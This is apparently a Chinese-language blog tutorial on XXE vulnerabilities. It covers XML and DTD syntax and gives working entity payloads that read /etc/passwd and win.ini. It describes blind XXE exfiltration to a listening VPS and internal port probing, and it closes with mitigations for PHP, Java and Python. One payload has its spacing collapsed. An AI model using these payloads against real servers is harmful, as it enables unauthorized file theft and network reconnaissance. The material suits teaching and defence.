浅谈XXE漏洞

XXE漏洞:程序在解析输入的XML数据的时候，解析了攻击者的伪造的外部实体产生的。

危害：SSRF攻击，使用file协议任意读取文件，端口探测，执行系统命令

什么是XML

XML是一种用来传输和存储数据的可扩展标记语言。

XML用于传输和数据存储。HTML用于显示数据。

Dtd文档类型定义是一套为了进行程序见的数据交换而建立的关于标记符的语法规则。

1.1 xml语法

语法规则

1.所有的XML元素都必须有一个关闭标签

2.XML标签对大小写敏感

3.XML必须正确嵌套

4.XML属性值必须加引号“”

5.实体引用：在标签属性，或者对应位置值可能出现<>符号，这些在对应的xml中都是特殊含义的，那么必须使用对应html的实体对应的表示:例如，<message>if salary < 1000 then </message>如果把这个“<”放在元素中，那么解析器会把他当成新元素的开始，就会发生报错。为了避免这个错误使用实体引用来代替<message>if salary &lt; 1000 then </message>

1.2 xml结构

XML 文档声明，在文档的第一行

XML 文档类型定义，即DTD，XXE 漏洞所在的地方

XML 文档元素

1.3 XML DTD（文档类型定义）

DTD的作用就是用来定义XML文档的合法构建模块DTD可以在XML文档内声明，也可以在外部引用。

内部声明DTD  <!DOCTYPE 根元素 [元素声明]>
外部声明DTD  <!DOCTYPE 根元素 SYSTEM "文件名">
<!DOCTYPE note SYSTEM "Note.dtd">
或者<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

 

 

XML显示的话会显示一个XML格式。

网站在window系统上搭建：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE ANY [

<!ENTITY xxes SYSTEM "file:///c:/windows/win.ini"> ]>

<user><username>&xxes;</username><password>admin</password></user>

网站在linux系统上搭建：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE ANY [

<!ENTITY xxes SYSTEM "file:///etc/passwd"> ]>

<user><username>&xxes;</username><password>admin</password></user>

如果存在XXE漏洞话直接输入恶意的payload会进行文件读取:

上面是文件读取有回显的。

如果是没有回显的话可以采取:blind XXE

我们可以利用HTTP协议发送到远程服务器上，写一个dtd文件：

 然后在服务器上监听8081端口：

 然后构造xxe代码输入到输入框进行提交：

 然后在vps看一下监听:

 Base64加密解密一下：

 端口探测：

 

利用外部实体攻击的http协议探测内网存活端口

如果面对JSON提交方式的话我们得去尝试会不会解析xml，修改content-type为xml，然后写一个xml看响应包会不会解析:

JSON提交方式：

 写进xml发现会进行解析:

 

还是回显的xxe我们可以直接构造payload进行读取passwd：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPEANY[<!ENTITYxxesSYSTEM"file:///etc/passwd"> ]>

<root>

&xxes;</root>

 

预防XXE注入漏洞

方案：使用开发语言提供的禁用外部实体的方法

1.PHP：

libxml_disable_entity_loader(true);

2.JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

3.Python：

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))